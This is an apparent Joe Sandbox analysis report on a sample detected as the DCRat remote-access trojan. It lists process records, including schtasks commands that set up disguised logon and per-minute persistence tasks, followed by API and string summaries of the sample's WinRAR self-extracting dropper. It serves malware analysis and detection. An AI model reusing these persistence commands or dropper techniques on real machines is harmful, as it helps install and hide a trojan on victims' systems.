Commandline:	schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6d81b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cAOdivXVvC.bat"
Imagebase:	0x7ff7f9ef0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:27:02
Start date:	30/10/2024
Path:	C:\surrogateserverreviewsession\dasHost.exe
Wow64 process (32bit):	false
Commandline:	C:\surrogateserverreviewsession\dasHost.exe
Imagebase:	0x810000
File size:	848'896 bytes
MD5 hash:	F1AAAC4C20DF683E3596C8A7CD3DA07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2217002951.0000000002C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2217002951.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:27:03
Start date:	30/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7d9ac0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:27:03
Start date:	30/10/2024
Path:	C:\surrogateserverreviewsession\dasHost.exe
Wow64 process (32bit):	false
Commandline:	C:\surrogateserverreviewsession\dasHost.exe
Imagebase:	0xbf0000
File size:	848'896 bytes
MD5 hash:	F1AAAC4C20DF683E3596C8A7CD3DA07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2219627479.0000000002F08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2219627479.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:27:03
Start date:	30/10/2024
Path:	C:\Program Files\7-Zip\Lang\Memory Compression.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\7-Zip\Lang\Memory Compression.exe"
Imagebase:	0x9c0000
File size:	848'896 bytes
MD5 hash:	F1AAAC4C20DF683E3596C8A7CD3DA07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2219542033.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2219542033.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:27:03
Start date:	30/10/2024
Path:	C:\Program Files\7-Zip\Lang\Memory Compression.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\7-Zip\Lang\Memory Compression.exe"
Imagebase:	0x3c0000
File size:	848'896 bytes
MD5 hash:	F1AAAC4C20DF683E3596C8A7CD3DA07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2240602993.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:27:03
Start date:	30/10/2024
Path:	C:\Program Files\Windows NT\uXGucUKOPdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows NT\uXGucUKOPdf.exe"
Imagebase:	0xce0000
File size:	848'896 bytes
MD5 hash:	F1AAAC4C20DF683E3596C8A7CD3DA07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.2220090209.0000000003028000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.2220090209.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:27:03
Start date:	30/10/2024
Path:	C:\Program Files\Windows NT\uXGucUKOPdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows NT\uXGucUKOPdf.exe"
Imagebase:	0xfa0000
File size:	848'896 bytes
MD5 hash:	F1AAAC4C20DF683E3596C8A7CD3DA07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2216128308.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2216128308.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:27:08
Start date:	30/10/2024
Path:	C:\surrogateserverreviewsession\dasHost.exe
Wow64 process (32bit):	false
Commandline:	"C:\surrogateserverreviewsession\dasHost.exe"
Imagebase:	0x4a0000
File size:	848'896 bytes
MD5 hash:	F1AAAC4C20DF683E3596C8A7CD3DA07E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.2256049771.000000000283B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000027.00000002.2256049771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1527
Total number of Limit Nodes:	39

Executed Functions

Function 0038D5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 003800E4
Part of subcall function 003800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003800F6
Part of subcall function 003800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00380127

Part of subcall function 00389DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00389DAC

Part of subcall function 0038A335: OleInitialize.OLE32(00000000), ref: 0038A34E
Part of subcall function 0038A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0038A385
Part of subcall function 0038A335: SHGetMalloc.SHELL32(003B8430), ref: 0038A38F

Part of subcall function 003813B3: GetCPInfo.KERNEL32(00000000,?), ref: 003813C4
Part of subcall function 003813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 003813D8

GetCommandLineW.KERNEL32 ref: 0038D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0038D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0038D654
UnmapViewOfFile.KERNEL32(00000000), ref: 0038D68E

Part of subcall function 0038D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0038D29D
Part of subcall function 0038D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0038D2D9

CloseHandle.KERNEL32(00000000), ref: 0038D697
GetModuleFileNameW.KERNEL32(00000000,003CDC90,00000800), ref: 0038D6B2
SetEnvironmentVariableW.KERNEL32(sfxname,003CDC90), ref: 0038D6BE
GetLocalTime.KERNEL32(?), ref: 0038D6C9
_swprintf.LIBCMT ref: 0038D708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0038D71A
GetModuleHandleW.KERNEL32(00000000), ref: 0038D721
LoadIconW.USER32(00000000,00000064), ref: 0038D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0038D789
Sleep.KERNEL32(?), ref: 0038D7B7
DeleteObject.GDI32 ref: 0038D7F0
DeleteObject.GDI32(?), ref: 0038D800
CloseHandle.KERNEL32 ref: 0038D843

Strings

STARTDLG, xrefs: 0038D77E
xj<, xrefs: 0038D7CB
C:\Users\user\Desktop, xrefs: 0038D5E9
sfxstime, xrefs: 0038D715
winrarsfxmappingfile.tmp, xrefs: 0038D637
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0038D6F9
sfxname, xrefs: 0038D6B9

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj<
API String ID: 788466649-3506444493
Opcode ID: cd8e61b7f5e759091883623fa2904b420b7dfdfaa55e33ddd7b6ddef774763a1
Instruction ID: fdef71fbdeb418e620256c1a77eadafa502393bdb8b741d0c651895b7d948c21
Opcode Fuzzy Hash: cd8e61b7f5e759091883623fa2904b420b7dfdfaa55e33ddd7b6ddef774763a1
Instruction Fuzzy Hash: 9B61CF71900341AFD323BBA6EC4AF6B77ACAB46744F000569F645D62A1DBB8DD04C762

Function 00389E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(0038AE4D,PNG,?,?,?,0038AE4D,00000066), ref: 00389E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0038AE4D,00000066), ref: 00389E46
LoadResource.KERNEL32(00000000,?,?,?,0038AE4D,00000066), ref: 00389E59
LockResource.KERNEL32(00000000,?,?,?,0038AE4D,00000066), ref: 00389E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0038AE4D,00000066), ref: 00389E82
GlobalLock.KERNEL32(00000000), ref: 00389E93
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00389EB7
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00389EFC
GlobalUnlock.KERNEL32(00000000), ref: 00389F1B
GlobalFree.KERNEL32(00000000), ref: 00389F22

Strings

PNG, xrefs: 00389E1F

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 33149037c8e362d0ee23566adc5efdbe7b42d363ab6b76a34216cd91a5296b48
Instruction ID: 0d7da0f30de3db31ece9b0b335eb68843c4193b4672356b0cdc836c7e6de270a
Opcode Fuzzy Hash: 33149037c8e362d0ee23566adc5efdbe7b42d363ab6b76a34216cd91a5296b48
Instruction Fuzzy Hash: 5C316171204706AFC717AF61DC48A6BBBADFF86752F09456AF906D6260DB31DC00CB61

Function 0037A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A692
GetLastError.KERNEL32(?,?,?,?,0037A4EF,000000FF,?,?), ref: 0037A69E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: cee4c5bf7f9ddfb728af6d3eebc8a485e296cbc38c23cf8efb99405803fb4878
Instruction ID: 399d32a71f6270cf4a350d4480232dc324d1922fab37f19421b479ec0f3e1a24
Opcode Fuzzy Hash: cee4c5bf7f9ddfb728af6d3eebc8a485e296cbc38c23cf8efb99405803fb4878
Instruction Fuzzy Hash: 19416176504641AFC326EF68C884ADEF7ECBF89340F054A2AF59DD3240D778A9548B92

Function 0039753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00397513,00000000,003ABAD8,0000000C,0039766A,00000000,00000002,00000000), ref: 0039755E
TerminateProcess.KERNEL32(00000000,?,00397513,00000000,003ABAD8,0000000C,0039766A,00000000,00000002,00000000), ref: 00397565
ExitProcess.KERNEL32 ref: 00397577

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a0069c289496bbfa7ee11b6fce647009ac0d471beb2d8fed35d168e9165e0db5
Instruction ID: 664b44d34eda271049e60b5923b00c41d2013b1886f031fdd6c3b61009b3cf2b
Opcode Fuzzy Hash: a0069c289496bbfa7ee11b6fce647009ac0d471beb2d8fed35d168e9165e0db5
Instruction Fuzzy Hash: 4FE0B631114948ABCF63BF64DD09A493F69EB42741F128414F90A8A262DB35DE42CA90

Function 0037857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00378580
_memcmp.LIBVCRUNTIME ref: 00378A08

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: de8ae9112a917eea009dd12a4a574c25b20bbf4e8aa64780612bd76765385ab6
Instruction ID: cebd76ecdda0d01132600dee415cbdf4104327ac5398d65a3cf400a58e1e9c24
Opcode Fuzzy Hash: de8ae9112a917eea009dd12a4a574c25b20bbf4e8aa64780612bd76765385ab6
Instruction Fuzzy Hash: 64821B70944245AEDF37DF64C889BFABBA9AF05300F09C5BAD94D9F142DB385A44CB60

Function 0038AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0038AEE5

Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365

Strings

STARTDLG, xrefs: 0038AF04
<, xrefs: 0038B29A
C:\Users\user\Desktop, xrefs: 0038B2DF
"%s"%s, xrefs: 0038B423
LICENSEDLG, xrefs: 0038B771
winrarsfxmappingfile.tmp, xrefs: 0038B2BC
@, xrefs: 0038B2A7
__tmp_rar_sfx_access_check_%u, xrefs: 0038B1CB
-el -s2 "-d%s" "-sp%s", xrefs: 0038B281

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3472986185
Opcode ID: cee121d339b16b390e8d281cbe6c07e7e5308f38191b0700d9a97fba27aa2faa
Instruction ID: 9dcade67cf78d3e5ee199e2f003390b2d210f05d5d1b55d949771b997ccf2c59
Opcode Fuzzy Hash: cee121d339b16b390e8d281cbe6c07e7e5308f38191b0700d9a97fba27aa2faa
Instruction Fuzzy Hash: 2A42C371944345BEEB23BBB09C4AFBFBB7CAB16704F004196F645AA191CB785A44CB21

Function 003800CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 003800E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003800F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00380127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003803D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003803F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00380402
ReadFile.KERNEL32(00000000,?,00007FFE,003A3BA4,00000000), ref: 00380421
CloseHandle.KERNEL32(00000000), ref: 00380479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0038048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 003804E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00380510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0038054A

Part of subcall function 00380085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003800A0
Part of subcall function 00380085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0037EB86,Crypt32.dll,00000000,0037EC0A,?,?,0037EBEC,?,?,?), ref: 003800C2

_swprintf.LIBCMT ref: 003805BE
_swprintf.LIBCMT ref: 0038060A

Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D

AllocConsole.KERNEL32 ref: 00380612
GetCurrentProcessId.KERNEL32 ref: 0038061C
AttachConsole.KERNEL32(00000000), ref: 00380623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00380649
WriteConsoleW.KERNEL32(00000000), ref: 00380650
Sleep.KERNEL32(00002710), ref: 0038065B
FreeConsole.KERNEL32 ref: 00380661
ExitProcess.KERNEL32 ref: 00380669

Strings

DXGIDebug.dll, xrefs: 00380169, 003804D3
SetDefaultDllDirectories, xrefs: 00380121
l<:, xrefs: 0038055C
0A:, xrefs: 00380391
`=:, xrefs: 003801FC
x=:, xrefs: 00380204
<?:, xrefs: 003802B5
p>:, xrefs: 0038025D
?:, xrefs: 003802AA
p?:, xrefs: 003802CB
T;:, xrefs: 00380154
<:, xrefs: 0038018C
?:, xrefs: 00380302
SetDllDirectoryW, xrefs: 003800F0
8<:, xrefs: 00380194
T?:, xrefs: 003802C0
X@:, xrefs: 00380339
DA:, xrefs: 0038039C
4=:, xrefs: 003801EC
uxtheme.dll, xrefs: 0038058B
kernel32, xrefs: 003800DD
>:, xrefs: 00380289
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 003805F8
dwmapi.dll, xrefs: 00380581
X>:, xrefs: 00380252
(@:, xrefs: 00380323
\A:, xrefs: 003803A7
P<:, xrefs: 0038019C
|<:, xrefs: 003801AC
D=:, xrefs: 003801F4
(>:, xrefs: 0038023C
p@:, xrefs: 00380344
@>:, xrefs: 00380247
@@:, xrefs: 0038032E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: <:$ ?:$(>:$(@:$0A:$4=:$8<:$<?:$@>:$@@:$D=:$DA:$DXGIDebug.dll$P<:$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;:$T?:$X>:$X@:$\A:$`=:$dwmapi.dll$kernel32$l<:$p>:$p?:$p@:$uxtheme.dll$x=:$|<:$>:$?:
API String ID: 1201351596-498112073
Opcode ID: b01077788da42f26c5671d361f15781ead2c5a37967755f822267862c7cb18fc
Instruction ID: d0e4a96a5d059093c8d87213790cca6f81be24d067ec36d63dd800f9c7aa72b7
Opcode Fuzzy Hash: b01077788da42f26c5671d361f15781ead2c5a37967755f822267862c7cb18fc
Instruction Fuzzy Hash: 2BD170B5148384ABD337EF50D849B9FBBECEF86704F00491DF6899A140D7B486488F62

Function 0038BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0038BDFA

Part of subcall function 0038AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0038AAFE

